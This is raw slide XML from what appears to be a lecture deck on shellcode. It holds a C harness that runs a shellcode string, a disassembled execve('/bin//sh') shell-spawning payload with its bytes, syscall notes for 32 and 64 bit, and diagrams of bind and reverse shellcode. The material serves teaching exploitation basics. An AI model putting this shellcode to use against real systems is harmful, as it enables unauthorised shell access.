              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>\x80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17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/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>shellcodetest.c</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t> = "\x31\xc0\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>[…]";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>	( *( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>(*)() ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>)();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>}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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>shellcodetest.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcodetest</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>shellcodetest</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Hi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>there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70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 (New New)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80592" y="831095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83505" y="5445224"/>
            <a:ext cx="2808312" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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Code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83505" y="4077072"/>
            <a:ext cx="2808312" cy="87068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 Rounded MT Bold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="de-CH" sz="3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6856" y="1693874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CH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804806e:  68 68 65 72 65   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 $0x65726568</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH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8048073:  68 48 69 20 74   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 $0x74206948</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH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8048078:  89 e1            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1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de-CH" sz="1800" b="1" dirty="0" err="1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de-CH" sz="1800" b="1" dirty="0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de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F709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de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F7099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04928" y="1693874"/>
            <a:ext cx="5601072" cy="936103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3855" y="3311709"/>
            <a:ext cx="3523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0991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Hi there”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>48 69 20 74 68 65 72 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F7099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41032" y="3265328"/>
            <a:ext cx="3456384" cy="955760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4091818" y="1693874"/>
            <a:ext cx="213110" cy="993360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flipH="1">
            <a:off x="4079510" y="2629977"/>
            <a:ext cx="228331" cy="257789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flipH="1" flipV="1">
            <a:off x="4091818" y="3092381"/>
            <a:ext cx="1149214" cy="180496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H="1" flipV="1">
            <a:off x="4088906" y="3272878"/>
            <a:ext cx="1152126" cy="948210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1286418" y="3074471"/>
            <a:ext cx="2805399" cy="198406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F70991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86418" y="2687234"/>
            <a:ext cx="2805399" cy="198406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2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80592" y="1047119"/>
            <a:ext cx="2808312" cy="2229614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Stack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3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Stuff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execute something else than printing “Hi there!”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6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Stuff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 11: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>execve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r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" i="1" dirty="0" err="1"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" i="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>[],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" i="1" dirty="0" err="1"/>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>[]);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e.g.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(“/bin/bash”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NULL, NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>);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10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Execute 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Shell Execute Shellcode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>08048060 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048060: 31 c0                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048062: 50                    push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048063: 68 2f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>2f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 73 68        push   $0x68732f2f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048068: 68 2f 62 69 6e        push   $0x6e69622f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 804806d: 89 e3                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 804806f: 89 c1                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048071: 89 c2                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048073: b0 0b                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>    $0xb,%al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048075: cd 80                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>    $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048077: 31 c0                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048079: 40                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 804807a: cd 80                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>    $0x80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33165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lack And White Comp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5" y="1480898"/>
            <a:ext cx="2099589" cy="2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  <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Black And White Computer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97" y="784434"/>
            <a:ext cx="6048672" cy="60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2904362" y="1484784"/>
            <a:ext cx="2912734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Server Software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59617" y="1736812"/>
            <a:ext cx="1414943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89280" y="1960440"/>
            <a:ext cx="639784" cy="396044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0606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Evil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180818" y="784434"/>
            <a:ext cx="76438" cy="4372758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4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5817096" y="1736812"/>
            <a:ext cx="2142521" cy="252028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7401272" y="1988840"/>
            <a:ext cx="559758" cy="396044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F70991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Evil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Shellcode! Example in one slide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1" y="908719"/>
            <a:ext cx="6840761" cy="34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99" y="4509120"/>
            <a:ext cx="827797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32 vs 64 bit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64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32bit vs 64bit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 in 64 bit are nearly identical to 32 bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to execute them:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>32 bit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>64 bit: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Where are the arguments:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>32 bit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebx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64 bit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rdx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5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32bit vs 64bit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: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1700808"/>
            <a:ext cx="7560840" cy="36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6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Types of shellcode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0726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shellcode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Types of shellcode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Local shellcode (privilege escalation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Remote shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reverse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Bind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Find</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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659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Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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Bind shellcode:</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="Black And White Comp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56" y="2132856"/>
            <a:ext cx="3163922" cy="31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lack And White Computer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97" y="1772816"/>
            <a:ext cx="4027048" cy="401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076784" y="2228095"/>
            <a:ext cx="2660192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Client Software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00993" y="2541391"/>
            <a:ext cx="1414943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06880" y="2600908"/>
            <a:ext cx="1330096" cy="396044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0606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249144" y="1897102"/>
            <a:ext cx="0" cy="4372758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 bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4736976" y="2793419"/>
            <a:ext cx="2464017" cy="551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 bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4736976" y="2480123"/>
            <a:ext cx="2464017" cy="1566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52498" y="213285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Port 8080</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4801060" y="283435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Port 31337</a:t>
            </a:r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30151754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Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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Reverse shellcode:</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="Black And White Comp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56" y="2124772"/>
            <a:ext cx="3163922" cy="31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lack And White Computer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97" y="1772816"/>
            <a:ext cx="4027048" cy="401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076784" y="2228095"/>
            <a:ext cx="2660192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Client Software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00993" y="2541391"/>
            <a:ext cx="1414943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06880" y="2600908"/>
            <a:ext cx="1330096" cy="396044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0606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249144" y="1897102"/>
            <a:ext cx="0" cy="4372758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 bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4736976" y="2793419"/>
            <a:ext cx="2464017" cy="55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3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4736976" y="2480123"/>
            <a:ext cx="2464017" cy="1594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2498" y="21107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Port 8080</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5673080" y="27989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Port 31337</a:t>
